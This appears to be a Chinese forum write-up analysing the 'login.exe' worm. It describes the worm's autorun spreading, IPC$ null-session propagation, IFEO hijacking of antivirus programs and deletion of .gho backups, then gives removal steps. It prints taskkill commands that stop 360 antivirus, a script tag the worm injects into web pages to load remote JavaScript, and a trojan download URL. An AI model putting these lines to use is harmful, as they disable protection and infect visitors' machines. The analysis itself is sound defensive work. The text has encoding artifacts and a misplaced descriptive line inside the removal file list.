樣本信息：File: login.exe
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203

1.病毒初始化:創(chuàng)建互斥量HGFSMUTEX，保證系統(tǒng)內(nèi)只有一個(gè)實(shí)例在運(yùn)行

2.釋放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復(fù)制到如下啟動(dòng)文件夾中達(dá)到開(kāi)機(jī)啟動(dòng)自身的目的
C:\Documents and Settings\Administrator\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\Default User\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe

3.執(zhí)行connnet.bat批處理內(nèi)的內(nèi)容

a.遍歷d~z盤(pán) 復(fù)制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目錄下

b.判斷中毒機(jī)器是否處于局域網(wǎng)，如果是則利用ipc漏洞建立一個(gè)空連接，并把a(bǔ)utorun.exe和%autorun.inf復(fù)制到機(jī)器的C$下面。

4.IFEO劫持某些殺毒軟件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不給你啟動(dòng).exe

5.試圖結(jié)束360軟件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f

6.遍歷所有磁盤(pán)刪除.gho文件

7.遍歷所有磁盤(pán)感染asp，htm，html，aspx，php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代碼

8.鏈接網(wǎng)絡(luò)下載木馬
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但鏈接已經(jīng)失效

解決方法：

1.復(fù)制如下文字 到剪貼板(假設(shè)系統(tǒng)在C盤(pán))
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復(fù)制到如下啟動(dòng)文件夾中達(dá)到開(kāi)機(jī)啟動(dòng)自身的目的
C:\Documents and Settings\Administrator\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe
C:\Documents and Settings\Default User\「開(kāi)始」菜單\程序\啟動(dòng)\login.exe


打開(kāi)Xdelbox.exe
在下面的大框中 單擊右鍵 點(diǎn)擊 “剪貼板導(dǎo)入不檢查路徑”
之后剛才復(fù)制的那個(gè)文件列表將出現(xiàn)在下面的大框中
然后再在下面的大框中單擊右鍵 點(diǎn)擊 “立即重啟執(zhí)行刪除” 
軟件會(huì)自動(dòng)重啟計(jì)算機(jī)

重啟計(jì)算機(jī)以后 會(huì)有兩個(gè)系統(tǒng)進(jìn)入的選擇的倒計(jì)時(shí)界面
第一個(gè)是你原來(lái)的windows系統(tǒng)
第二個(gè)是這個(gè)軟件給你設(shè)定的dos系統(tǒng)
不用你管，它會(huì)自動(dòng)選擇進(jìn)入第二個(gè)系統(tǒng)
類(lèi)似dos的界面滾動(dòng)完畢以后 病毒就被刪除了
之后他會(huì)自動(dòng)重啟進(jìn)入正常模式

2.打開(kāi)sreng 啟動(dòng)項(xiàng)目 注冊(cè)表
刪除所有紅色的IFEO項(xiàng)目

3.建議屏蔽http://17vp.cn網(wǎng)站

最新評(píng)論